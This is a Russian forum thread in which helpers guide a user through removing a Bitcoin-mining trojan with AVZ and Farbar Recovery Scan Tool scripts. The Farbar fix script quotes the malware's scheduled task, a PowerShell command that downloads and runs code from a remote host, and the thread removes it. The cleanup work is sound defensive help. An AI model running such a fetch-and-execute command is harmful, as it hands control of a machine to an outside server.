Перейти к содержанию

[РЕШЕНО] Поймала Tool.BtcMine.2794, восстанавливается после удаления.


Рекомендуемые сообщения

Здравствуйте.

 

Запустите AVZ из папки Autologger от имени Администратора по правой кнопке мыши.

 

Выполните скрипт в AVZ (ФайлВыполнить скрипт – вставить текст скрипта из окна Код)

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
 TerminateProcessByName('c:\programdata\winaijservice\winaijservice.exe');
 QuarantineFile('c:\programdata\winaijservice\winaijservice.exe','');
 TerminateProcessByName('c:\programdata\cacservice\cacservices.exe');
 QuarantineFile('c:\programdata\cacservice\cacservices.exe','');
 DeleteFile('c:\programdata\cacservice\cacservices.exe','32');
 DeleteFile('c:\programdata\winaijservice\winaijservice.exe','32');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','CAC Service','x64');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','Win AIJ Service','x64');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(false);
end.

  • Обратите внимание: будет выполнена перезагрузка компьютера.

 

Выполните скрипт в AVZ

begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine ./Quarantine/', 1, 0, true);
end.

Отправьте quarantine.7z из папки с распакованной утилитой AVZ с помощью формы отправки карантина или на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.

 

Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.
 

Ссылка на комментарий
Поделиться на другие сайты

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

  • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.


1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan (Дополнительные опции) отмечены List BCD и 90 Days Files.
3. Нажмите кнопку Scan (Сканировать).
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.
 

Ссылка на комментарий
Поделиться на другие сайты

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать)

Start::
CreateRestorePoint:
CloseProcesses:
HKLM\...\Run: [Win AIJ Service] => C:\ProgramData\WinAIJService\WinAIJService.exe [13191680 2025-05-09] () [Файл не подписан]
Task: {DA3113D1-1501-4369-8683-34D1E140D3A1} - System32\Tasks\Microsoft\Office\Office Persistent Activation => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [454656 2025-04-06] (Microsoft Windows -> Microsoft Corporation) -> -Command "irm hxxps://activation.techias.co.uk/ | iex" <==== ВНИМАНИЕ
Folder: C:\ProgramData\WinAIJService
2025-05-07 13:01 - 2025-05-09 15:12 - 000000000 ____D C:\ProgramData\WinAIJService
FirewallRules: [{717e2b8d-bf00-40ee-b78a-05b2b2e1b965}] => (Allow) C:\ProgramData\CACService\CACServices.exe => Нет файла
FirewallRules: [{f2c334ec-5696-4b16-b374-e35d0e88cf0b}] => (Allow) C:\ProgramData\CACService\CACServices.exe => Нет файла
FirewallRules: [TCP Query User{86F659F3-64BD-4E89-B8EC-043EB3758110}D:\games\the last of us part i-insaneramzes\tlou-i.exe] => (Block) D:\games\the last of us part i-insaneramzes\tlou-i.exe => Нет файла
FirewallRules: [UDP Query User{6747A527-EADF-45FC-9422-31418D26EC40}D:\games\the last of us part i-insaneramzes\tlou-i.exe] => (Block) D:\games\the last of us part i-insaneramzes\tlou-i.exe => Нет файла
FirewallRules: [TCP Query User{A8923723-3E8A-43D2-82B0-6D67D28E8B52}D:\games\train.life.a.railway.simulator.steam.rip-insaneramzes\train life - a railway simulator\trainlife\binaries\win64\trainlife-win64-shipping.exe] => (Block) D:\games\train.life.a.railway.simulator.steam.rip-insaneramzes\train life - a railway simulator\trainlife\binaries\win64\trainlife-win64-shipping.exe => Нет файла
FirewallRules: [UDP Query User{9B9CA470-B0EA-41D5-A7D8-79659736E0FA}D:\games\train.life.a.railway.simulator.steam.rip-insaneramzes\train life - a railway simulator\trainlife\binaries\win64\trainlife-win64-shipping.exe] => (Block) D:\games\train.life.a.railway.simulator.steam.rip-insaneramzes\train life - a railway simulator\trainlife\binaries\win64\trainlife-win64-shipping.exe => Нет файла
FirewallRules: [TCP Query User{C36F7EDA-AE71-4BFB-AF9F-70B78C9E4213}D:\games\assetto corsa competizione\ac2\binaries\win64\ac2-win64-shipping.exe] => (Block) D:\games\assetto corsa competizione\ac2\binaries\win64\ac2-win64-shipping.exe => Нет файла
FirewallRules: [UDP Query User{477E619A-9325-4C91-9D61-DDF4BBD04D37}D:\games\assetto corsa competizione\ac2\binaries\win64\ac2-win64-shipping.exe] => (Block) D:\games\assetto corsa competizione\ac2\binaries\win64\ac2-win64-shipping.exe => Нет файла
FirewallRules: [TCP Query User{6FB2C629-EAFD-4359-8BFD-00EC11B2341E}D:\games\assetto corsa\acs.exe] => (Block) D:\games\assetto corsa\acs.exe => Нет файла
FirewallRules: [UDP Query User{B4317D2D-55E1-4CBC-A83B-4BC52492B18C}D:\games\assetto corsa\acs.exe] => (Block) D:\games\assetto corsa\acs.exe => Нет файла
FirewallRules: [{5e052845-20c2-4f27-838c-c2c0f99e46a1}] => (Allow) C:\ProgramData\WinAIJService\WinAIJService.exe () [Файл не подписан]
FirewallRules: [{968e96c3-2d2d-438e-8b58-54659b825834}] => (Allow) C:\ProgramData\WinAIJService\WinAIJService.exe () [Файл не подписан]
FirewallRules: [{95d2fa27-d645-477e-9e40-860ebbe3a4fe}] => (Allow) C:\ProgramData\WinAIJService\WinAIJService.exe () [Файл не подписан]
FirewallRules: [{ecbe1834-1b2a-4208-af55-b48c126e7a05}] => (Allow) C:\ProgramData\WinAIJService\WinAIJService.exe () [Файл не подписан]
FirewallRules: [{05c7097d-72f4-440b-a299-f388017e21e5}] => (Allow) C:\ProgramData\WinAIJService\WinAIJService.exe () [Файл не подписан]
FirewallRules: [{8af0e928-a45a-45b4-a32f-3b0c851a28cb}] => (Allow) C:\ProgramData\WinAIJService\WinAIJService.exe () [Файл не подписан]
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание: будет выполнена перезагрузка компьютера.

Ссылка на комментарий
Поделиться на другие сайты

Смените все пароли, они могли быть скомпрометированы.

 

Загрузите SecurityCheck by glax24 & Severnyj и сохраните архив на Рабочем столе.

  • Разархивируйте, запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/10/11);
  • Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу;
  • Дождитесь окончания сканирования, откроется лог в Блокноте с именем SecurityCheck.txt;
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt;
  • Прикрепите этот файл в своем следующем сообщении.


 
Ссылка на комментарий
Поделиться на другие сайты

По возможности исправьте:

 

CrystalDiskInfo 9.6.0 v.9.6.0 Внимание! Скачать обновления
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.38.33135 v.14.38.33135.0 Внимание! Скачать обновления
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.40.33810 v.14.40.33810.0 Внимание! Скачать обновления
AIMP v.5.40.2674 Внимание! Скачать обновления
^Внимание! Данный установщик устанавливает сторонние программы. Снимайте галочки или нажимайте Отмена в соответствующих окнах установщика.^

---------------------------- [ UnwantedApps ] -----------------------------
CCleaner v.6.35 Внимание! Подозрение на демо-версию антивредоносной программы, программу для обновления драйверов, программу-оптимизатор или программу очистки реестра. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии. Компьютерные эксперты не рекомендуют использовать такие программы.

 

На этом закончим.

Ссылка на комментарий
Поделиться на другие сайты

Мы были рады Вам помочь! Надеемся, что Вы остались довольны результатом. На нашем форуме также можно получить компьютерную помощь, помощь по продуктам "Лаборатории Касперкого", обсудить технологии и технику, заказать эксклюзивную сувенирную продукцию "Лаборатории Касперского" бесплатно! Форумчане ежегодно путешествуют. В числе приглашенных в ТурциюАрмениюСочиКамбоджу можете быть и Вы! Будем рады видеть Вас в наших рядах! Всегда ваш, клуб "Лаборатории Касперского".

Ссылка на комментарий
Поделиться на другие сайты

Гость
Эта тема закрыта для публикации ответов.
×
×
  • Создать...